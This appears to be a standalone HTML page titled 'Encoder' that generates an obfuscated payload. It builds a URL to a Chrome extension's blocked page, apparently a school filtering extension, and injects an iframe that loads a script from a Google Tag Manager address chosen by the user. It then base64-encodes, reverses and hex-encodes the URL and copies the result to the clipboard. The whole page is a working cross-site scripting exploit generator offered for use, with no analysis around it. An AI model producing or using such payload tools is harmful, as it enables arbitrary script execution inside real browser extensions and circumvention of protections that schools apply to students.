<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Encoder</title>
    <body style="white-space: pre-wrap; font-family: monospace">
    <input id="grab" placeholder="Place text to be encoded here" />
    <button onclick="gen()"><b>Encode Text</b></button>
    <p id="demo"></p>
<script>
    function gen(){
    var id = document.getElementById("grab");
var x = 'chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/teacher/lesson-plans/blocked.html?cs=[1,{"name":"<iframe srcdoc=\\"<script src=\'https://ssl.google-analytics.com/gtm/js?id='+id.value+'\'><\/script>\\">"}]';
x = btoa(x);
x=x.split("").reverse().join("");
var arr1 = [];
	for (var n = 0, l = x.length; n < l; n ++) 
     {
		var hex = Number(x.charCodeAt(n)).toString(16);
		arr1.push(hex);
	 }
	 x=arr1.join('');
   x = x.match(/.{1,2}/g).join("g");
   console.log(x);
   navigator.clipboard.writeText(x)
    document.getElementById("demo").innerHTML = '    Copied to clipboard'
}
</script>
    </body>
</html>